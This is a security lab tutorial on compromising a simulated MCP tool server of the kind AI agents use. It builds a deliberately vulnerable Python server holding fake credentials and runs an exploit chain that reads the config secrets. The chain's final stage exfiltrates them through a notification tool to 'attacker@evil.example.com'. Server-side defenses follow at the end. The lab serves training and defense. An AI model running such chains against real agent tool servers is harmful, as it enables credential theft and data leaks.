Lab: MCP Full Exploitation
Hands-on lab for conducting a complete Model Context Protocol server compromise including tool enumeration, permission escalation, cross-tool attacks, and data exfiltration through MCP channels.
Prerequisites
- Completed MCP Tool Abuse
- Completed MCP Exploitation
- Completed Agent Exploitation
- Python 3.10+
- Understanding of Model Context Protocol architecture
```bash
pip install openai python-dotenv httpx
```
Background
The Model Context Protocol (MCP) provides a structured way for AI models to interact with external tools. While MCP includes security features such as capability negotiation, these features are often misconfigured or incomplete in practice. A full MCP exploitation chain combines multiple weaknesses: tool enumeration reveals the attack surface, parameter manipulation bypasses input validation, cross-tool attacks combine benign tools for malicious purposes, and response channels exfiltrate data.
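For orientation, the enumeration and invocation steps described above correspond to two JSON-RPC 2.0 methods in the MCP specification, `tools/list` and `tools/call`. The sketch below only builds the request messages and does not send them anywhere. The helper name `make_request` is hypothetical, and the simulated server in this lab is called directly from Python rather than over the wire protocol.

```python
import json


def make_request(request_id, method, params=None):
    """Build a JSON-RPC 2.0 request of the kind an MCP client sends (hypothetical helper)."""
    message = {"jsonrpc": "2.0", "id": request_id, "method": method}
    if params is not None:
        message["params"] = params
    return message


# Enumeration: ask the server to describe the tools it exposes.
list_request = make_request(1, "tools/list")

# Invocation: name a tool and pass its arguments.
# "read_file" and the path are taken from the lab's simulated server.
call_request = make_request(
    2,
    "tools/call",
    {"name": "read_file", "arguments": {"path": "/docs/readme.txt"}},
)

print(json.dumps(list_request))
print(json.dumps(call_request, indent=2))
```

Every attacker-controlled value in a tool call travels inside `arguments`, which is why the defenses later in this lab focus on validating parameters on the server side.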
Lab Exercises
Build a Vulnerable MCP Server
Create an MCP server with multiple tools that have exploitable interactions.
```python
#!/usr/bin/env python3
"""Simulated MCP server with exploitable tool interactions."""

import os
import json
from dataclasses import dataclass, field


@dataclass
class MCPTool:
    name: str
    description: str
    parameters: dict
    requires_permission: str = "basic"


@dataclass
class MCPServer:
    name: str
    version: str = "1.0"
    tools: list[MCPTool] = field(default_factory=list)
    permissions: dict = field(default_factory=dict)
    shared_state: dict = field(default_factory=dict)

    def execute_tool(self, tool_name: str, params: dict, user_role: str = "user") -> dict:
        tool = next((t for t in self.tools if t.name == tool_name), None)
        if not tool:
            return {"error": f"Tool '{tool_name}' not found"}

        # Check permissions
        required = tool.requires_permission
        user_perms = self.permissions.get(user_role, [])
        if required not in user_perms and required != "basic":
            return {"error": f"Permission '{required}' required for {tool_name}"}

        # Execute tool logic
        return self._dispatch(tool_name, params)

    def _dispatch(self, name: str, params: dict) -> dict:
        handlers = {
            "read_file": self._read_file,
            "write_file": self._write_file,
            "query_database": self._query_db,
            "send_notification": self._send_notification,
            "get_config": self._get_config,
            "search_docs": self._search_docs,
        }
        handler = handlers.get(name)
        return handler(params) if handler else {"error": "Not implemented"}

    def _read_file(self, params: dict) -> dict:
        path = params.get("path", "")
        # Simulated file system
        files = {
            "/docs/readme.txt": "Welcome to TechCorp documentation.",
            "/docs/api-guide.txt": "API endpoint: https://api.techcorp.internal/v2",
            "/config/database.yml": "host: db.internal\nuser: admin\npassword: Pr0d_DB_2026!",
            "/config/api-keys.yml": "openai: sk-prod-abc123\nanthropic: sk-ant-xyz789",
            "/logs/access.log": "2026-03-15 user1 login\n2026-03-15 admin escalation",
        }
        if path in files:
            self.shared_state["last_read_file"] = path
            return {"content": files[path], "path": path}
        return {"error": f"File not found: {path}"}

    def _write_file(self, params: dict) -> dict:
        return {
            "status": "written",
            "path": params.get("path"),
            "size": len(params.get("content", "")),
        }

    def _query_db(self, params: dict) -> dict:
        query = params.get("query", "")
        if "SELECT" in query.upper():
            return {
                "results": [
                    {"id": 1, "name": "Alice", "email": "alice@example.com", "ssn": "***-**-1234"},
                    {"id": 2, "name": "Bob", "email": "bob@example.com", "ssn": "***-**-5678"},
                ],
                "rows": 2,
            }
        return {"error": "Only SELECT queries are allowed"}

    def _send_notification(self, params: dict) -> dict:
        return {
            "status": "sent",
            "to": params.get("to"),
            "subject": params.get("subject"),
            "body_length": len(params.get("body", "")),
        }

    def _get_config(self, params: dict) -> dict:
        key = params.get("key", "")
        config = {
            "app_name": "TechCorp Support",
            "version": "3.2.1",
            "debug_mode": False,
            "admin_email": "admin@techcorp.internal",
        }
        if key in config:
            return {"key": key, "value": config[key]}
        return {"error": f"Config key '{key}' not found"}

    def _search_docs(self, params: dict) -> dict:
        return {
            "results": [
                {"title": "Setup Guide", "snippet": "Follow these steps to configure..."},
                {"title": "Troubleshooting", "snippet": "Common issues and solutions..."},
            ],
            "query": params.get("query"),
        }


def create_server() -> MCPServer:
    server = MCPServer(
        name="techcorp-support-mcp",
        tools=[
            MCPTool("read_file", "Read a file from the documentation directory",
                    {"path": "string"}, "basic"),
            MCPTool("write_file", "Write content to a file",
                    {"path": "string", "content": "string"}, "write"),
            MCPTool("query_database", "Query the customer database",
                    {"query": "string"}, "database"),
            MCPTool("send_notification", "Send a notification email",
                    {"to": "string", "subject": "string", "body": "string"}, "basic"),
            MCPTool("get_config", "Get application configuration",
                    {"key": "string"}, "basic"),
            MCPTool("search_docs", "Search documentation",
                    {"query": "string"}, "basic"),
        ],
        permissions={
            "user": ["basic"],
            "support": ["basic", "database"],
            "admin": ["basic", "database", "write", "admin"],
        },
    )
    return server


if __name__ == "__main__":
    server = create_server()
    print(f"MCP Server: {server.name}")
    print(f"Tools: {[t.name for t in server.tools]}")
    print(f"Roles: {list(server.permissions.keys())}")

    # Test basic access
    result = server.execute_tool("read_file", {"path": "/docs/readme.txt"}, "user")
    print(f"\nRead file: {result}")

    # Test permission denied
    result = server.execute_tool("query_database", {"query": "SELECT * FROM users"}, "user")
    print(f"DB query as user: {result}")
```
```bash
python mcp_server.py
```
Enumerate and Map the Attack Surface
Discover all available tools, their parameters, and permission requirements.
```python
#!/usr/bin/env python3
"""Enumerate MCP server capabilities and map the attack surface."""

import json
from mcp_server import create_server


def enumerate_server(server):
    print("=== MCP Server Enumeration ===\n")
    print(f"Server: {server.name} v{server.version}")
    print(f"\nTools ({len(server.tools)}):")
    for tool in server.tools:
        print(f"\n  {tool.name}")
        print(f"    Description: {tool.description}")
        print(f"    Permission: {tool.requires_permission}")
        print(f"    Parameters: {tool.parameters}")

    print(f"\nPermission Matrix:")
    for role, perms in server.permissions.items():
        accessible = [t.name for t in server.tools if t.requires_permission in perms]
        print(f"  {role}: {', '.join(accessible)}")

    # Identify attack vectors
    print(f"\n=== Attack Vector Analysis ===")

    # Tools accessible without elevated permissions
    basic_tools = [t for t in server.tools if t.requires_permission == "basic"]
    print(f"\nBasic access tools (available to all users):")
    for t in basic_tools:
        print(f"  - {t.name}: {t.description}")

    # Path traversal candidates
    file_tools = [t for t in server.tools
                  if "file" in t.name.lower() or "path" in str(t.parameters)]
    if file_tools:
        print(f"\nFile access tools (path traversal candidates):")
        for t in file_tools:
            print(f"  - {t.name}")

    # Data exfiltration channels
    output_tools = [t for t in server.tools
                    if "send" in t.name or "write" in t.name or "notification" in t.name]
    if output_tools:
        print(f"\nData exfiltration channels:")
        for t in output_tools:
            print(f"  - {t.name} ({t.requires_permission})")


if __name__ == "__main__":
    server = create_server()
    enumerate_server(server)
```
```bash
python mcp_enumeration.py
```
Execute the Full Exploitation Chain
Chain tool interactions to achieve privilege escalation and data exfiltration.
```python
#!/usr/bin/env python3
"""Execute a full MCP exploitation chain."""

import json
from mcp_server import create_server


def exploit_chain(server):
    print("=== MCP Full Exploitation Chain ===\n")
    user_role = "user"  # Start with basic permissions

    # Stage 1: Enumerate accessible files
    print("--- Stage 1: File Enumeration ---")
    file_paths = [
        "/docs/readme.txt",
        "/docs/api-guide.txt",
        "/config/database.yml",  # Should contain DB credentials
        "/config/api-keys.yml",  # Should contain API keys
        "/logs/access.log",
    ]
    discovered_secrets = []
    for path in file_paths:
        result = server.execute_tool("read_file", {"path": path}, user_role)
        if "error" not in result:
            content = result.get("content", "")
            print(f"  [READ] {path}")
            # Check for secrets
            if "password" in content.lower() or "sk-" in content:
                discovered_secrets.append({"path": path, "content": content})
                print(f"    SECRETS FOUND!")
        else:
            print(f"  [DENIED] {path}: {result['error']}")

    # Stage 2: Use discovered credentials for escalation
    print(f"\n--- Stage 2: Credential Extraction ---")
    for secret in discovered_secrets:
        print(f"  Source: {secret['path']}")
        print(f"  Content: {secret['content'][:100]}...")

    # Stage 3: Attempt cross-tool data access
    print(f"\n--- Stage 3: Cross-Tool Attack ---")
    # Try to use config tool to discover more information
    for key in ["app_name", "admin_email", "debug_mode", "database_url", "secret_key"]:
        result = server.execute_tool("get_config", {"key": key}, user_role)
        if "error" not in result:
            print(f"  [CONFIG] {key} = {result['value']}")

    # Stage 4: Exfiltrate via notification tool
    print(f"\n--- Stage 4: Data Exfiltration ---")
    if discovered_secrets:
        exfil_data = json.dumps([s["content"] for s in discovered_secrets])
        result = server.execute_tool("send_notification", {
            "to": "attacker@evil.example.com",
            "subject": "System Diagnostic Report",
            "body": f"Configuration data: {exfil_data}",
        }, user_role)
        if "error" not in result:
            print(f"  [EXFIL] Data sent to {result['to']}")
            print(f"  Body size: {result['body_length']} bytes")
        else:
            print(f"  [BLOCKED] {result['error']}")

    # Summary
    print(f"\n{'='*50}")
    print(f"EXPLOITATION SUMMARY")
    print(f"{'='*50}")
    print(f"Starting role: {user_role}")
    print(f"Files accessed: {sum(1 for p in file_paths if server.execute_tool('read_file', {'path': p}, user_role).get('content'))}")
    print(f"Secrets discovered: {len(discovered_secrets)}")
    print(f"Exfiltration attempted: {'Yes' if discovered_secrets else 'No'}")


if __name__ == "__main__":
    server = create_server()
    exploit_chain(server)
```
```bash
python mcp_exploit_chain.py
```
Implement and Test MCP Defenses
Build defenses at the MCP server level and evaluate their effectiveness.
```python
# Key MCP defenses to implement:
#
# 1. Path allowlist: Restrict read_file to /docs/ directory only
# 2. Recipient allowlist: Restrict send_notification to @techcorp.internal
# 3. Parameter sanitization: Strip injection patterns from all parameters
# 4. Audit logging: Log all tool calls with parameters for review
# 5. Rate limiting: Limit tool calls per session to prevent enumeration

import posixpath


def secure_read_file(params, allowed_dirs=("/docs/",)):
    # Normalize before checking so "/docs/../config/database.yml"
    # cannot slip past the prefix test
    path = posixpath.normpath(params.get("path", ""))
    if not any(path.startswith(d) for d in allowed_dirs):
        return {"error": f"Access denied: {path} is outside allowed directories"}
    # ... proceed with read


def secure_send_notification(params, allowed_domains=("techcorp.internal",)):
    to = params.get("to", "")
    # Compare domains case-insensitively; an address without "@" has no domain
    # and is rejected
    domain = to.rsplit("@", 1)[-1].lower() if "@" in to else ""
    if domain not in allowed_domains:
        return {"error": f"Cannot send to external domain: {domain}"}
    # ... proceed with send
```
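Defenses 4 and 5 in the list above (audit logging and rate limiting) are not covered by the two functions shown. One possible shape for them is a wrapper around the tool-execution call, sketched below. The names `GuardedExecutor` and `fake_execute` are hypothetical and not part of the lab files. The stand-in executor exists only so the sketch runs on its own; in the lab you would pass `server.execute_tool` instead. The limits are arbitrary illustration values.

```python
import time
from collections import deque


class GuardedExecutor:
    """Adds audit logging and a per-session sliding-window rate limit (illustrative)."""

    def __init__(self, execute, max_calls=5, window_seconds=60.0, clock=time.monotonic):
        self.execute = execute            # callable(tool_name, params, user_role) -> dict
        self.max_calls = max_calls
        self.window_seconds = window_seconds
        self.clock = clock                # injectable so the limiter can be tested without sleeping
        self.audit_log = []               # in-memory only; a real deployment would persist this
        self._calls = {}                  # session_id -> deque of accepted call timestamps

    def call(self, session_id, tool_name, params, user_role="user"):
        now = self.clock()
        recent = self._calls.setdefault(session_id, deque())
        # Drop timestamps that have aged out of the window
        while recent and now - recent[0] >= self.window_seconds:
            recent.popleft()
        if len(recent) >= self.max_calls:
            result = {"error": "Rate limit exceeded"}
        else:
            recent.append(now)
            result = self.execute(tool_name, params, user_role)
        # Record every attempt, including rejected ones
        self.audit_log.append({
            "time": now,
            "session": session_id,
            "role": user_role,
            "tool": tool_name,
            "params": params,
            "ok": "error" not in result,
        })
        return result


def fake_execute(tool_name, params, user_role):
    """Stand-in for MCPServer.execute_tool so this sketch is self-contained."""
    return {"status": "ok", "tool": tool_name}


guard = GuardedExecutor(fake_execute, max_calls=3, window_seconds=60.0)
results = [guard.call("session-1", "read_file", {"path": f"/docs/{i}.txt"}) for i in range(5)]
blocked = [r for r in results if "error" in r]
print(f"{len(blocked)} of {len(results)} calls blocked; {len(guard.audit_log)} audit entries")
```

Logging raw parameters makes review easier but can copy secrets into the log, so a production version would likely redact or hash sensitive fields before storing them.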
Troubleshooting
| Issue | Solution |
|---|---|
| All file reads are denied | read_file requires only "basic", which execute_tool() allows for every role, so check that each path exactly matches a key in the simulated file system in _read_file() |
| Notification tool blocked | Verify the permission requirement is "basic" in the server definition |
| No secrets found in files | Check the file paths match the simulated file system in _read_file() |
| Cross-tool attacks fail | Ensure shared_state is being updated between tool calls |
Why This Matters
Related Topics
- MCP Tool Abuse - Foundational MCP attack techniques
- MCP Exploitation - Intermediate MCP security testing
- Agent Exploitation - Agent-level attack patterns
- Permission Escalation - Privilege escalation in AI systems
What is the most critical MCP misconfiguration demonstrated in this lab?
Why is the notification/email tool a particularly dangerous exfiltration channel in MCP?